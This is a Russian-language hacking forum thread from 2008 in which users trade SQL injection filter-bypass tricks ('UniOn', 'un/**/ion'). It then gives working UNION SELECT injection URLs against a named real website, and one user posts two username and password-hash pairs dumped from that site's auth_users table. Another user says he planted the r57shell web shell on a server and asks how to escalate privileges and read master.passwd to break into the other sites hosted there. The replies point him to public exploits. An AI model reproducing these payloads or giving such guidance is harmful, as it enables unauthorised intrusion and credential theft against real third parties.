18.11.2008, 19:32
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
С нами:
9875796
Репутация:
770
|
|
Сообщение от .acme
я в курсе. меня интересует именно фактическое применение union, но в обход фильтрации.
может фильтроваться только "union" в нижнем регистре, встречал такое одажды. -> "UniOn"
после того, как админ пофиксил, я использовал " -> "un/**/ion".
гдето видел статью на тему обхода фильтрации, на досуге поищу в своих архивах (-
|
|
|
18.11.2008, 19:34
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами:
10254549
Репутация:
227
|
|
.acme, мне кажется что там просто мускул третьей ветки...
Дай линк поковыряем
|
|
|
|
18.11.2008, 19:39
|
|
Новичок
Регистрация: 14.11.2008
Сообщений: 12
С нами:
9204703
Репутация:
10
|
|
Вот помогите есть уязвимость но не выводится ничего http://www.ewb-usa.org/news.php?ID=-1'
|
|
|
|
18.11.2008, 19:56
|
|
Познающий
Регистрация: 09.11.2008
Сообщений: 34
С нами:
9212732
Репутация:
2
|
|
Сообщение от Sindicat
Вот помогите есть уязвимость но не выводится ничего http://www.ewb-usa.org/news.php?ID=-1'
вот держи
http://www.ewb-usa.org/news.php?ID=-1'+union+select+version(),2,3/*
дальше сам кавыряй...))
|
|
|
|
18.11.2008, 20:09
|
|
Новичок
Регистрация: 14.11.2008
Сообщений: 12
С нами:
9204703
Репутация:
10
|
|
Сообщение от peonix
вот держи
http://www.ewb-usa.org/news.php?ID=-1'+union+select+version(),2,3/*
дальше сам кавыряй...))
Спасибоо !! одна ' все решает )))
http://www.ewb-usa.org/news.php?ID=-1'+union+select+concat_ws(0x3a,UserName,password), 2,3+from+auth_users+limit+3,1/*
Ann:1756543d9b768d870fab2000d9b667f8
Meg:f807febec044b8dfa8996c79da35e599
|
|
|
|
18.11.2008, 20:03
|
|
Познающий
Регистрация: 09.11.2008
Сообщений: 34
С нами:
9212732
Репутация:
2
|
|
Сообщение от Sindicat
Вот помогите есть уязвимость но не выводится ничего http://www.ewb-usa.org/news.php?ID=-1'
вот решил добить...
http://www.ewb-usa.org/news.php?ID=-1'+union+select+concat(username,char(58),password) ,2,3+from+auth_users/*
|
|
|
|
18.11.2008, 19:47
|
|
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
С нами:
9740547
Репутация:
93
|
|
o3,14um там пятая ветка, разные UnIoN, uni"+"on,un/**/ion - не проходят.
http://ma s t e r o ff.org/edit.php?q='' (13cols)
|
|
|
|
18.11.2008, 19:53
|
|
Познающий
Регистрация: 09.11.2008
Сообщений: 34
С нами:
9212732
Репутация:
2
|
|
Ну блин - залить это одно а серв прокавырять это ж совсем другое. Из по админа сайта залил, вот а что дальше делать чтоб к остальным сайтам на этом серваке пробиться?
|
|
|
|
18.11.2008, 23:37
|
|
Познающий
Регистрация: 09.11.2008
Сообщений: 34
С нами:
9212732
Репутация:
2
|
|
Люди помогите плиз. У меня проблема - залил r57shell на серв - там сэйф моде отключен система freebsd 6.2. Можно ли как нибудь повысить привелегии, или вообще получить пароли к остальным сайтам на этом серве - это моя основная цель (из файлов с паролями читается только pwd.db, а passwd файла вообще нет, поэтому назревает вопрос а можно ли прочитать как нибудь master.passwd). Заранее спасибо
|
|
|
|
19.11.2008, 15:48
|
|
Постоянный
Регистрация: 04.11.2007
Сообщений: 303
С нами:
9746420
Репутация:
119
|
|
Сообщение от peonix
Люди помогите плиз. У меня проблема - залил r57shell на серв - там сэйф моде отключен система freebsd 6.2. Можно ли как нибудь повысить привелегии, или вообще получить пароли к остальным сайтам на этом серве - это моя основная цель (из файлов с паролями читается только pwd.db, а passwd файла вообще нет, поэтому назревает вопрос а можно ли прочитать как нибудь master.passwd). Заранее спасибо
стандарт: узнай че висит на сервере, потом идешь, например, на милворм и ищешь "инструмент"(эксплойт) и можешь действовать 
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
